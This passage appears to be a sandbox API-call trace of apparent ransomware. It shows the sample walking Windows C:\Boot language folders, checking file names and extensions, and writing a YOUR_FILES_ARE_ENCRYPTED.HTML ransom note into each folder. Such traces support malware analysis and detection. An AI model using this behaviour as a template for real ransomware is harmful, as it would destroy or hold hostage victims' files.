hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fb1320, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.147] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 33 [0155.147] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.147] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.147] lstrlenW (lpString=".mui") returned 4 [0155.147] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.147] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fb1320, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.147] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.147] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.147] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\ja-jp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.147] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.149] CloseHandle (hObject=0x4a4) returned 1 [0155.150] GetProcessHeap () returned 0x270000 [0155.151] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.151] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fb1320, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44fb1320, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0155.151] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR") returned 17 [0155.151] GetProcessHeap () returned 0x270000 [0155.151] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.151] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\ko-KR" | out: lpString1="\\\\?\\C:\\Boot\\ko-KR") returned="\\\\?\\C:\\Boot\\ko-KR" [0155.151] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\ko-KR", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\ko-KR\\*") returned="\\\\?\\C:\\Boot\\ko-KR\\*" [0155.151] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ko-KR\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fb1320, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44fb1320, 
ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.152] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fb1320, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44fb1320, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.152] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fb1320, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.152] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 33 [0155.152] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.152] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.152] lstrlenW (lpString=".mui") returned 4 [0155.152] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.152] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fb1320, ftLastAccessTime.dwHighDateTime=0x1d706a3, 
ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.152] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.152] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.152] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\ko-kr\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.152] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.154] CloseHandle (hObject=0x4a4) returned 1 [0155.155] GetProcessHeap () returned 0x270000 [0155.156] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.156] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fb1320, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xf8aff852, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0155.156] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\memtest.exe") returned 23 [0155.156] lstrcmpW (lpString1="memtest.exe", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 
[0155.156] PathFindExtensionW (pszPath="memtest.exe") returned=".exe" [0155.156] lstrlenW (lpString=".exe") returned 4 [0155.156] PathFindExtensionW (pszPath="memtest.exe") returned=".exe" [0155.156] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fd7480, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44fd7480, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0155.156] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO") returned 17 [0155.156] GetProcessHeap () returned 0x270000 [0155.156] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.156] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\nb-NO" | out: lpString1="\\\\?\\C:\\Boot\\nb-NO") returned="\\\\?\\C:\\Boot\\nb-NO" [0155.156] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\nb-NO", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\nb-NO\\*") returned="\\\\?\\C:\\Boot\\nb-NO\\*" [0155.156] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nb-NO\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fd7480, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44fd7480, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.158] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4bbf40, 
ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fd7480, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44fd7480, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.158] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fd7480, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.158] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 33 [0155.158] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.158] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.158] lstrlenW (lpString=".mui") returned 4 [0155.158] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.158] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fd7480, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.158] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.158] wnsprintfW (in: pszDest=0x431df40, 
cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.158] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\nb-no\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.159] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.161] CloseHandle (hObject=0x4a4) returned 1 [0155.161] GetProcessHeap () returned 0x270000 [0155.162] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.162] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fd7480, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44fd7480, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0155.162] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL") returned 17 [0155.162] GetProcessHeap () returned 0x270000 [0155.162] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.162] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\nl-NL" | out: lpString1="\\\\?\\C:\\Boot\\nl-NL") returned="\\\\?\\C:\\Boot\\nl-NL" [0155.162] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\nl-NL", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\nl-NL\\*") returned="\\\\?\\C:\\Boot\\nl-NL\\*" [0155.162] FindFirstFileW 
(in: lpFileName="\\\\?\\C:\\Boot\\nl-NL\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fd7480, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44fd7480, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.162] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fd7480, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44fd7480, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.162] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fd7480, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.162] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 33 [0155.162] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.162] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.162] lstrlenW (lpString=".mui") returned 4 [0155.162] PathFindExtensionW (pszPath="bootmgr.exe.mui") 
returned=".mui" [0155.163] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fd7480, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.163] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.163] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.163] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\nl-nl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.163] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.165] CloseHandle (hObject=0x4a4) returned 1 [0155.165] GetProcessHeap () returned 0x270000 [0155.166] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.166] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fd7480, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44fd7480, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 
dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0155.166] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL") returned 17 [0155.166] GetProcessHeap () returned 0x270000 [0155.166] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.166] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\pl-PL" | out: lpString1="\\\\?\\C:\\Boot\\pl-PL") returned="\\\\?\\C:\\Boot\\pl-PL" [0155.166] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\pl-PL", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\pl-PL\\*") returned="\\\\?\\C:\\Boot\\pl-PL\\*" [0155.166] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pl-PL\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fd7480, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44fd7480, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.168] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fd7480, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44fd7480, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.168] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fd7480, 
ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.168] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 33 [0155.168] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.168] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.168] lstrlenW (lpString=".mui") returned 4 [0155.168] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.168] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fd7480, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.168] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.168] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.168] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\pl-pl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.169] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, 
lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.171] CloseHandle (hObject=0x4a4) returned 1 [0155.171] GetProcessHeap () returned 0x270000 [0155.172] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.172] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44ffd5e0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44ffd5e0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0155.172] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR") returned 17 [0155.172] GetProcessHeap () returned 0x270000 [0155.172] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.172] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\pt-BR" | out: lpString1="\\\\?\\C:\\Boot\\pt-BR") returned="\\\\?\\C:\\Boot\\pt-BR" [0155.173] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\pt-BR", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\pt-BR\\*") returned="\\\\?\\C:\\Boot\\pt-BR\\*" [0155.173] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-BR\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44ffd5e0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44ffd5e0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.173] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: 
